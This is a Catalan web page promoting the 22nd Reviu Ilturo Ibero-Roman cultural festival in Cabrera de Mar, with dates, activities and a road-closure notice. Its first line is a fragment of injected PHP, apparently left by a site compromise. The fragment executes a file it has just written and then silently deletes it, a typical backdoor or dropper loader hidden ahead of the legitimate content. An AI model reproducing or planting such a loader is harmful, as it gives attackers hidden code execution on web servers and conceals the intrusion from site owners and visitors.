');fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Festival cultural iberoromà Reviu Ilturo

Reviu la cultura antiga, REVIU ILTURO

El Festival cultural iberoromà Reviu Ilturo convertirà per uns dies Cabrera de Mar en l’antiga Ilturo. Enguany el festival celebra la seva XXII edició I el festival es prolongarà durant dos caps de setmana: 2-3 i 9-10 d’octubre 2021.

Descarrega la programació resumida (clic aquí)

El primer cap de setmana reviurem el passat iber d’Ilturo i el segon ens endinsarem en el seu passat romà.

El passat històric de Cabrera de Mar ens sorprèn dia a dia amb noves troballes i el Festival cultural iberoromà Reviu Ilturo pretén divulgar el ric patrimoni arqueològic local, on fa més de 20 segles convivien ibers i romans.

Viatja al passat de la manera més divertida a través de visites guiades, recreacions històriques i tallers per a totes les edats. Prepara un àpat romà, crea joies antigues, aprèn com es curaven les ferides els gladiadors... i molt més!

Reviu Ilturo t'espera!

COM ARRIBAR (clica aquí)

ATENCIÓ: el diumenge 3 d'octubre, degut a la prova esportiva Ironman, la carretera Nacional II romandrà tancada des de Montgat fins a Calella de 07:30h a 18:00h aproximadament.

 


Programació

Públic Recomanat

Per a tots els públics

No t'ho perdis!

D: 2-3 i 9-10 d’octubre
COMPRA LA TEVA ENTRADA

Butlletí electrònic